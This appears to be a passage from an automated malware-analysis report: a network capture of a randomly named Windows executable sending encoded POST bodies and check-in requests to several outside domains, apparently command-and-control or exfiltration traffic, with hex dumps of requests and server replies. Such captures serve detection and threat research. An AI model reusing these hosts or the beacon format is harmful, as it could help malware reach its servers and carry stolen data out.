                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 79 4a 45 79 45 6d 4f 67 39 35 59 2f 35 37 67 71 72 37 35 30 46 43 73 47 35 58 37 64 35 6f 77 33 2f 4d 31 42 6a 44 4f 37 58 71 79 36 43 70 73 39 44 73 49 77 70 77 43 42 69 75 30 66 35 63 6a 36 59 78 51 45 70 6c 67 30 77 62 79 58 75 70 59 4e 6c 53 6b 62 38 5a 71 46 68 4c 4e 64 74 4d 64 62 51 43 68 78 38 73 49 76 46 70 2b 33 41 58 54 6b 35 38 5a 67 32 2f 7a 72 33 32 4d 51 54 41 31 4a 38 77 4c 54 55 7a 47 30 7a 6c 67 73 78 68 44 68 56 2b 6b 63 35 64 55 2f 62 72 37 78 77 4c 6b 6f 77 39 41 33 61 51 63 6a 6e 71 74 69 2b 74 70 48 64 36 66 68 45 68 37 72 6a 52 75 59 32 4c 47 54 66 39 73 34 65 4d 30 33 6d 55 34 3d
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5ow3/M1BjDO7Xqy6Cps9DsIwpwCBiu0f5cj6YxQEplg0wbyXupYNlSkb8ZqFhLNdtMdbQChx8sIvFp+3AXTk58Zg2/zr32MQTA1J8wLTUzG0zlgsxhDhV+kc5dU/br7xwLkow9A3aQcjnqti+tpHd6fhEh7rjRuY2LGTf9s4eM03mU4=


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    63192.168.11.204979513.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:29.006437063 CEST2578OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 79 4a 45 79 45 6d 4f 67 39 35 59 2f 35 37 67 71 72 37 35 30 46 43 73 47 35 58 37 64 35 6f 6f 33 2f 2b 74 42 6a 6b 69 37 57 71 79 36 65 35 73 2b 44 73 49 39 70 77 4b 64 69 75 4a 6b 35 61 6e 36 5a 53 6f 45 76 51 41 30 36 62 79 58 78 5a 59 4d 72 79 6b 30 38 59 61 5a 68 4c 39 64 74 4d 64 62 51 41 35 78 76 64 49 76 49 4a 2b 77 51 33 54 67 71 73 59 33 32 2f 71 63 33 32 41 41 54 78 56 4a 6c 51 62 54 53 41 75 30 73 56 67 75 39 42 43 6e 56 2f 59 48 35 65 77 64 62 72 50 66 77 4b 73 6f 31 73 31 61 4a 44 35 2f 39 38 73 71 37 64 64 4c 56 63 7a 4e 4c 52 4c 54 6e 51 7a 77 31 73 4c 61 64 4d 64 34 4d 63 49 6a 6b 44 38 50 56 62 79 37 6d 7a 4e 2f 2f 64 32 36 6a 31 44 31 73 6a 4d 36 65 2b 31 42 72 4b 5a 30 52 47 68 68 6a 4f 47 43 56 7a 53 38 6c 71 4d 2f 6a 38 58 43 6f 43 61 35 73 33 4a 30 45 44 70 50 63 36 74 50 45 38 4e 2b 36 71 52 4e 6e 49 70 41 44 71 51 36 57 6e 6a 49 38 72 42 48 31 37 4d 2b 67 33 4f 43 46 66 76 4b 35 4c 50 47 42 67 73 76 47 31 6f 6b 6c 65 47 74 77 79 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5oo3/+tBjki7Wqy6e5s+DsI9pwKdiuJk5an6ZSoEvQA06byXxZYMryk08YaZhL9dtMdbQA5xvdIvIJ+wQ3TgqsY32/qc32AATxVJlQbTSAu0sVgu9BCnV/YH5ewdbrPfwKso1s1aJD5/98sq7ddLVczNLRLTnQzw1sLadMd4McIjkD8PVby7mzN//d26j1D1sjM6e+1BrKZ0RGhhjOGCVzS8lqM/j8XCoCa5s3J0EDpPc6tPE8N+6qRNnIpADqQ6WnjI8rBH17M+g3OCFfvK5LPGBgsvG1okleGtwy2xjwkrvQSfuyX3+PIVP6LnOw1jjDL+ApJ/9swwxewhWVe8oo5GADdgi2IP8RtpHIAv0/1Zxt9cjp1eUO2gMIFvBvwvpTG0OzDoZYVqQ0J8eD6hMIbhyCVZy8+qiVmjn2fG2oOHeD25pa1J9kzJ29pjK+y+xlAbJa0yC4fGN1UMbqHX68qSz+1HgZXb7K0hELFyA7Jans3UzwTiu+csZqx3YtF9Bs0fchfubSxuQKye/nc+UImL//NdDfMauHF7HHZtG6adyVcyo48WS2o5u+iIJr/p+apdCb8NXi50NOrqfc7AQyF1QqH7jpmZ/Rr7N6nzx3lkNtOPNOjdUV8gm7PDrOxJ7GFpaHaWQ8mvmevm9ZOSyMsTOiXOdJbJA428VmIWXDATyoweJb6Pk31IAL1QZ9mWCGMAaFNzHAzMW0MOYG/RUDHXtn4bSYIBpt+xvlpW6rfhWOc1sdlArC+EVV5DywYoHbjrPWcg8OSDUeuGkzsn29n7/Ee6Z1XQahwUqF/sallk72vquWctiIF4uTSx4yOstcXWr+utearqRyCAh7Mlm5JsFiOMIPfSUefW+49nDEWuiLnhmpVQT2kUxOGn5l6SnWyyQKD/zMhE/in6D+1o/gsN6+euWQw22B8dHKRyBkC8Yl16v0GFxnOoBIWFVpXjg4pora5U [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:29.006459951 CEST4349OUTData Raw: 39 6e 5a 42 4a 4f 70 73 2f 49 50 71 56 6a 74 4d 5a 51 58 68 64 6a 56 47 39 63 51 47 62 78 66 73 54 66 4b 71 61 4c 59 6b 59 6e 56 48 41 36 36 4d 31 62 33 76 57 71 45 44 71 6c 33 69 4a 4e 6d 2f 57 4a 78 7a 55 6e 55 6a 38 4b 59 43 69 77 7a 70 61 64
                                                                                                                                                    Data Ascii: 9nZBJOps/IPqVjtMZQXhdjVG9cQGbxfsTfKqaLYkYnVHA66M1b3vWqEDql3iJNm/WJxzUnUj8KYCiwzpad4bMZr5Rqseyx8nlvziZRy+kcKZ4pyTAnbye4oefKby4flJZqDY019dCQNPEzb0RoUmd+g65sUTVfnam4lIDdS7odG5JZlRX9I2xdeUAwdj9W1u+YoImKRyMiLRXpUMrFHzVVjKIDOyIOP2KmumOeA7P8Ij6uU38En


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    64192.168.11.204979613.248.169.4880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:31.631722927 CEST432OUTGET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:02:31.734312057 CEST397INHTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:31 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 257
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 62 47 3d 39 30 4a 35 68 6e 6b 4b 4d 71 57 6d 39 35 45 64 4f 44 48 56 67 59 55 38 6a 4c 6c 53 75 71 55 5a 4f 67 46 66 2f 69 50 49 79 72 56 71 78 4f 70 35 75 44 50 47 64 4c 6a 79 64 4b 35 62 65 63 74 78 73 79 33 42 74 74 52 6c 33 59 79 4c 4d 67 38 4a 68 78 45 33 76 4b 4b 6b 30 65 45 66 76 56 39 4b 70 59 53 39 67 64 42 70 6a 4a 74 44 63 43 31 79 78 75 64 52 42 4c 4d 3d 26 6d 32 57 34 79 3d 65 4c 71 50 33 7a 53 70 66 44 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    65192.168.11.204979743.252.167.18880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:37.062827110 CEST708OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 37 58 39 57 66 45 4d 30 50 2f 64 59 46 34 6f 45 61 46 63 53 39 6d 71 78 57 37 55 45 4f 69 49 68 4c 42 48 56 2f 59 6c 71 66 65 73 79 76 52 46 32 30 55 31 4a 69 35 76 54 35 4a 54 6c 64 6f 53 42 53 79 4a 51 57 77 63 63 77 57 31 43 6d 2b 58 4c 33 45 70 44 2f 46 45 53 75 39 35 4c 57 62 6e 53 4f 65 38 6d 51 6f 70 6b 6c 2f 6c 4d 5a 74 37 2f 62 62 2b 38 77 6c 70 45 41 65 56 43 4c 4d 36 4d 71 4b 49 31 67 4b 70 4e 61 54 32 4f 34 38 42 51 56 6b 6e 6c 72 43 4c 6b 56 73 58 4f 6c 45 42 6b 48 4e 59 64 42 55 78 49 64 75 55 58 77 68 55 75 37 2b 48 4b 55 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R7X9WfEM0P/dYF4oEaFcS9mqxW7UEOiIhLBHV/YlqfesyvRF20U1Ji5vT5JTldoSBSyJQWwccwW1Cm+XL3EpD/FESu95LWbnSOe8mQopkl/lMZt7/bb+8wlpEAeVCLM6MqKI1gKpNaT2O48BQVknlrCLkVsXOlEBkHNYdBUxIduUXwhUu7+HKUg==
                                                                                                                                                    Oct 4, 2024 12:02:37.373456955 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:21 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    66192.168.11.204979843.252.167.18880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:39.910324097 CEST728OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 35 33 4e 57 64 6e 55 30 59 50 64 62 62 6f 6f 45 51 6c 63 65 39 68 69 78 57 35 35 63 4e 52 73 68 4c 68 33 56 74 4a 6c 71 52 2b 73 79 33 42 46 7a 70 6b 31 43 69 35 6a 78 35 4e 58 6c 64 73 43 42 53 77 52 51 57 6a 30 66 69 57 31 41 79 4f 58 46 7a 45 70 44 2f 46 45 53 75 39 74 79 57 62 50 53 50 75 4d 6d 52 4e 64 6e 35 50 6c 50 65 74 37 2f 51 37 2b 67 77 6c 70 79 41 62 78 6f 4c 4a 6d 4d 71 49 41 31 75 2b 64 4d 50 6a 32 4d 38 38 41 58 56 6e 32 54 6c 53 33 67 61 73 48 46 6c 55 52 74 4c 37 4a 48 63 6d 46 73 65 39 49 6c 30 52 74 47 35 38 47 52 4a 70 38 51 6e 6c 78 72 58 6a 36 34 47 6d 43 4d 4b 61 73 33 6b 4c 41 3d
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRshLh3VtJlqR+sy3BFzpk1Ci5jx5NXldsCBSwRQWj0fiW1AyOXFzEpD/FESu9tyWbPSPuMmRNdn5PlPet7/Q7+gwlpyAbxoLJmMqIA1u+dMPj2M88AXVn2TlS3gasHFlURtL7JHcmFse9Il0RtG58GRJp8QnlxrXj64GmCMKas3kLA=
                                                                                                                                                    Oct 4, 2024 12:02:40.228224039 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:24 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    67192.168.11.204979943.252.167.18880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:42.738281012 CEST2578OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 35 33 4e 57 64 6e 55 30 59 50 64 62 62 6f 6f 45 51 6c 63 65 39 68 69 78 57 35 35 63 4e 52 6b 68 49 53 2f 56 2f 36 64 71 53 2b 73 79 70 52 46 79 70 6b 31 62 69 35 37 31 35 4e 61 53 64 71 65 42 52 54 5a 51 43 47 49 66 34 47 31 41 74 65 58 45 33 45 70 53 2f 46 30 57 75 39 39 79 57 62 50 53 50 74 55 6d 57 59 70 6e 37 50 6c 4d 5a 74 37 6a 62 62 2b 63 77 68 4d 48 41 62 30 64 49 36 2b 4d 72 6f 51 31 73 4e 31 4d 4e 44 32 4b 78 63 41 31 56 6e 36 41 6c 53 71 5a 61 73 79 53 6c 56 5a 74 59 64 63 61 50 45 4e 74 42 4e 49 70 34 78 70 72 2b 2b 47 36 45 62 30 62 6a 54 77 47 57 6b 71 42 46 55 53 44 59 4b 5a 77 35 63 42 79 34 79 43 6c 74 4f 49 34 49 31 53 71 65 67 78 72 43 70 74 32 56 31 74 74 4f 65 55 69 62 4a 66 53 67 6e 77 4e 77 6d 33 78 45 7a 49 51 52 4d 52 56 44 39 5a 35 4a 41 76 68 6e 6a 55 6c 2b 56 6c 76 33 54 65 73 35 31 79 78 69 4e 46 51 52 2b 5a 43 46 4e 6b 7a 4b 50 52 48 51 45 37 4a 56 34 32 66 69 6b 4d 33 48 52 42 2f 6e 38 4d 57 65 6d 4f 75 45 41 71 2b 57 5a [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRkhIS/V/6dqS+sypRFypk1bi5715NaSdqeBRTZQCGIf4G1AteXE3EpS/F0Wu99yWbPSPtUmWYpn7PlMZt7jbb+cwhMHAb0dI6+MroQ1sN1MND2KxcA1Vn6AlSqZasySlVZtYdcaPENtBNIp4xpr++G6Eb0bjTwGWkqBFUSDYKZw5cBy4yCltOI4I1SqegxrCpt2V1ttOeUibJfSgnwNwm3xEzIQRMRVD9Z5JAvhnjUl+Vlv3Tes51yxiNFQR+ZCFNkzKPRHQE7JV42fikM3HRB/n8MWemOuEAq+WZLxH77LROzcGy9AoYwTyN0rFYzQQGSLQweu3TdmAMMv+R+WbQU9LCwqhIA0IC1ef0CNwpEXIVxrBA/AjcXDgo+X2ddZ6J+zqqbGxyUsJAriDrxFfrs/vdn2L71kLHNZ+A5Z1DTnCUMrieC2D8PLILY6su8QRZc+LzJHU371YyU9BUyHBWx2RSV5eqcronmJCy8xRdIbG+Krpr6HpYviqS4XncWm2HLHAtK67FcckCGiTKHDwvpZP56lo0uCbU42M8Koi0VYOtYTBeH9JZ2XM1H4Goz2CrF7CgTfUwOT/YHTT4xOVkdu7YW3y3ZQED+cy87BhDBr5KMnziAmM01g1dnbFspgZAjFIMdVeCkTQXVVjLFkXoJO9HUJv2L6qHzG+r3uSKAjLwrPhEmjLYPzoFPD/Ad2lidIY0QapjvMgMLCcylRQAB3yUpIV4d+5AAtBCrNDDSS5d+TJfzcFmOkGA+mB0gKWMq9eQGlQSbDxV7c1KhOaXe756OVfmuyO91p+EUUhBuzRPiw7ZpAuT7TFCIHjSIrukA1gd8nXoZN79l31c0P3tzsoAlD1EahsUPnMseAPC8pwVymDwn3GdCdL6SFQHDEaBiYX4WB1wDCU+YKCpD1rk8L0njHvjnwpAeIZjwcQGeZIPBBDHLI7072/DxL8162vs/5LeQ1 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:42.738358021 CEST4355OUTData Raw: 69 44 4c 59 66 37 79 58 63 33 72 57 64 6b 69 2b 2b 67 59 30 50 66 46 32 49 58 74 49 76 57 32 2b 47 70 70 4e 33 73 68 35 2b 63 39 76 69 61 41 77 7a 54 45 64 4e 6d 2b 76 53 36 31 49 4b 6c 2f 59 64 73 6b 41 49 67 33 41 4f 48 74 47 59 51 41 42 77 47
                                                                                                                                                    Data Ascii: iDLYf7yXc3rWdki++gY0PfF2IXtIvW2+GppN3sh5+c9viaAwzTEdNm+vS61IKl/YdskAIg3AOHtGYQABwGl7jkqZxzmyDmDfQalsCFpzLbIQVZGnDFiZ0rvbi7GIERGmum74Y05PCuNrbsKGtmAxKyjkVBW/TtisfC4erzPTtEltaVzRE391HfuJXXr+jGNhQYxHbCfkpFwXyWET6/loJeheMcpkS8hixAqQQnjff3PqiOJ6Iaz
                                                                                                                                                    Oct 4, 2024 12:02:43.042527914 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:27 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    68192.168.11.204980043.252.167.18880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:45.572509050 CEST434OUTGET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:02:45.882251024 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:30 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                    69192.168.11.204980131.217.192.15880
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:51.100986004 CEST693OUTPOST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 6a 61 48 45 4b 6a 63 69 4d 63 37 6a 31 44 53 77 42 36 46 63 69 67 30 39 69 48 51 43 62 5a 30 7a 70 6c 6c 42 6e 43 35 78 6d 59 73 63 4a 57 42 64 63 34 78 65 65 35 76 67 73 62 58 31 72 4f 34 74 4c 50 34 61 4f 51 6d 69 45 46 6c 36 50 53 6e 42 42 54 58 39 76 62 53 6f 58 69 38 53 30 75 62 4e 32 51 58 58 36 53 41 67 6c 6b 4d 72 37 79 76 52 6f 41 2b 48 52 4d 63 2b 44 74 75 4a 39 30 51 46 54 6d 7a 77 7a 71 51 6e 4f 4b 78 6e 59 42 56 65 58 76 67 78 33 73 52 41 63 49 50 6a 30 37 61 46 62 37 62 61 73 71 49 45 42 4d 42 78 4d 35 30 4e 39 2b 55 36 4c 72 48 6e 59 66 65 43 6c 4c 2b 47 77 67 3d 3d
